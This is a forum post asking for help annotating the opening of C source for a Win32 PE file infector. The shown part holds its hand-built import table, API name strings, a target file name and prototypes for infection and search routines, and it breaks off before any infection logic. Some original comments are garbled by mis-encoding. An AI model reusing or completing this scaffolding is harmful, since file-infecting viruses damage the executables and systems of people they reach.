高手们，我有一个 C 语言程序，能不能帮我分析一下，并打上注释？
主要是那些乱码，还有开头的那些宏定义，我真的不懂。这是一个小小的病毒程序：
//win32cpp - PE infector
//authors - meza & SMT
#include <windows.h>
// Packs four values into one 32-bit number: a lands in the lowest byte and d
// in the highest (a + b*2^8 + c*2^16 + d*2^24). Plain addition is used, so
// the result is a clean byte packing only when every argument is in 0..255.
// NOTE(review): no use of this macro appears in this part of the listing.
#define WORD4(a,b,c,d) ((a)+(b)*0x100+(c)*0x10000+(d)*0x1000000)
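//#pragma pack (4) // [original comment is mis-encoded Russian, apparently CP1251 text rendered as GBK; approximate translation:] not sure this is written correctly... what I need here is
// for the data in the structures to be aligned on a 4-byte boundary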
// Data block of the program. The author's own comments label its first three
// parts as an import directory, a lookup table and imported-function slots;
// after them come API-name strings, message strings and bookkeeping fields.
// Every char array is 12, 16 or 20 bytes long (a multiple of 4), which is
// consistent with the commented-out `#pragma pack (4)` before the struct.
// NOTE(review): the API names and messages are plain string literals, so they
// are visible to ordinary static string inspection of a compiled sample.
struct GLOBAL { // constants (original comment was mis-encoded Russian)
struct { // import directory
// NOTE(review): five 32-bit fields in this order look like one PE import
// descriptor (lookup-table RVA, link time, forwarder chain, library-name RVA,
// address-table RVA) — confirm against the code that fills them.
unsigned lookup;
unsigned linktime, chain;
unsigned libname;
unsigned addrtable;
// Five more 32-bit slots, zero in the initializer; presumably the all-zero
// descriptor that ends an import directory — TODO confirm.
unsigned nextitem[5];
} importdir;
struct { // lookup table
// Three 32-bit entries, all zero in the initializer; presumably two import
// entries followed by a terminator — not verifiable from this part.
unsigned func1;
unsigned func2;
unsigned funcN;
} lookup;
struct { // imported functions
// Two pointer slots, NULL in the initializer. firstfunc declares locals with
// the same two signatures; where these slots get their values is not shown.
FARPROC (__stdcall *_GetProcAddress_)(HMODULE, const char *);
HINSTANCE (__stdcall *_LoadLibrary_)(const char *);
} imported;
// Library names (initialised to "KERNEL32.DLL" and "USER32.DLL").
char libname[16];
char user[16];
// Names of the two imported functions; each initializer starts with two NUL
// bytes before the name.
char getProcAddress[20];
char loadLibrary[16];
// Four 32-bit bookkeeping values, all 0 in the initializer. The names suggest
// relative virtual addresses; their use is not visible in this part.
unsigned entryRVA;
unsigned prev_import;
unsigned startRVA;
unsigned importRVA;
// NUL-terminated API names; each matches one function-pointer member of FUNC.
char createFileA[12];
char closeHandle[12];
char readFile[12];
char writeFile[12];
char setFilePointer[16];
char getFileSize[12];
char exitProcess[12];
char messageBoxA[12];
char getModuleHandle[20];
// A file name (initialised to "GOAT.EXE"); how it is used is not shown here.
char goat[16];
// Message texts, presumably passed to the MessageBox pointer — TODO confirm.
char exception[20];
char infstart[20];
char infend[20];
// Two 32-bit values, both 0 in the initializer; the names suggest flags.
unsigned importdone;
unsigned isdll;
} globals = {
// importdir: all ten 32-bit slots zero
{ 0, 0, 0, 0, 0, {0, 0, 0, 0, 0}},
// lookup: func1, func2, funcN
{ 0, 0, 0},
// imported: both function pointers (brace elision fills the nested struct)
NULL, NULL,
"KERNEL32.DLL",
"USER32.DLL",
// The two leading NUL bytes presumably stand for the 16-bit hint that
// precedes a name in a PE import-by-name entry — TODO confirm.
"\0\0GetProcAddress",
"\0\0LoadLibraryA",
// entryRVA, prev_import, startRVA, importRVA
0, 0, 0, 0,
"CreateFileA",
"CloseHandle",
"ReadFile",
"WriteFile",
"SetFilePointer",
"GetFileSize",
"ExitProcess",
"MessageBoxA",
"GetModuleHandleA",
"GOAT.EXE",
"exception occured",
"infection started",
"infection ended",
// importdone
0,
// isdll
0
};
// Table of Win32 entry points held as __stdcall function pointers, plus a
// pointer to the GLOBAL data block. firstfunc declares one FUNC as a local and
// the prototyped routines receive it by pointer (PFUNC).
// Each pointer member corresponds to an API-name string kept in struct GLOBAL.
// NOTE(review): the code that fills these pointers is not in this part of the
// listing; presumably they are resolved at run time by name — TODO confirm.
// NOTE(review): several members take LPCTSTR while the names stored in GLOBAL
// are the ...A exports, so the signatures match only in a non-UNICODE build.
typedef struct { // "global" variables (original comment was mis-encoded Russian)
// File access
HANDLE (__stdcall *_CreateFile)(LPCTSTR,DWORD,DWORD,LPSECURITY_ATTRIBUTES,DWORD,DWORD,HANDLE);
BOOL (__stdcall *_CloseHandle)(HANDLE);
BOOL (__stdcall *_ReadFile)(HANDLE,LPVOID,DWORD,LPDWORD,LPOVERLAPPED);
BOOL (__stdcall *_WriteFile)(HANDLE,const void *,DWORD,LPDWORD,LPOVERLAPPED);
DWORD (__stdcall *_SetFilePointer)(HANDLE,LONG,PLONG,DWORD);
DWORD (__stdcall *_GetFileSize)(HANDLE,LPDWORD);
// Symbol and library lookup (same signatures as GLOBAL.imported)
FARPROC (__stdcall *_GetProcAddress)(HMODULE, const char *);
HINSTANCE (__stdcall *_LoadLibrary)(const char*);
// Process exit, message box, module lookup
void (__stdcall *_ExitProcess)(UINT);
int (__stdcall *_MessageBox)(HWND,LPCTSTR,LPCTSTR,UINT);
HMODULE (__stdcall *_GetModuleHandle)(LPCTSTR);
// Run-time address of the GLOBAL block (firstfunc sets it from delta()).
struct GLOBAL *globals;
} FUNC;
// Pointer to the function table; every routine below that needs an API call
// or the GLOBAL block takes one of these.
typedef FUNC *PFUNC;
// Callback shapes accepted by seh(): a worker that returns unsigned and an
// error handler that returns nothing, both taking the function table.
typedef unsigned (__stdcall *SEHFUNC)(PFUNC);
typedef void (__stdcall *ERRFUNC)(PFUNC);
// prototypes (original comment was mis-encoded Russian) ----------------
// delta: firstfunc calls it with the address of lastfunc and uses the result
// as the address of the GLOBAL block. Its implementation is not shown here.
void *delta(void *start);
// lastfunc: only its address is used in the visible code (as the argument to
// delta); presumably a marker for the end of the code — TODO confirm.
void lastfunc();
// NOTE(review): these reuse the standard names strcpy/strcat with a void
// return type, so they are presumably the file's own replacements for the C
// runtime versions — definitions are not in this part of the listing.
void strcpy(char *, char *);
void strcat(char *, char *);
// infect: takes the function table and a name; body not shown here.
int infect(PFUNC func, char *name);
// seh: takes a SEHFUNC, an ERRFUNC and the function table; presumably runs the
// first under an exception handler and calls the second on a fault — confirm.
unsigned seh(SEHFUNC, ERRFUNC, PFUNC);
// search has the SEHFUNC signature and infecterror the ERRFUNC signature.
unsigned __stdcall search(PFUNC);
void __stdcall infecterror(PFUNC);
// ------------------------------------
// RVA(x): adds offset x to `base` and yields the sum as an unsigned*. `base`
// is not a macro parameter, so a variable of that name must be in scope where
// the macro is used (firstfunc declares `unsigned base`). Both operands are
// cast to unsigned, so this is only correct where pointers fit in 32 bits.
#define RVA(x) (unsigned*)((unsigned)base+(unsigned)(x))
// ALIGN(a,b): rounds a up to the next multiple of b; a value that is already
// a multiple is returned unchanged. The bit trick is valid only when b is a
// power of two. The arguments are not parenthesised inside the expansion, so
// it is safe only with simple operands.
#define ALIGN(a,b) (((a-1) | (b-1))+1)
BOOL __stdcall firstfunc(HANDLE p1, DWORD p2, LPVOID p3) { // DllMain, 黩钺?玎疣驵螯 DLL
FUNC func;
struct GLOBAL *globals;
unsigned name;
unsigned base;
FARPROC (__stdcall *_GetProcAddress)(HMODULE, const char *);
HINSTANCE (__stdcall *_LoadLibrary)(const char *);
globals = func.globals = (struct GLOBAL*)delta((void*)lastfunc);
//桤戾?蝰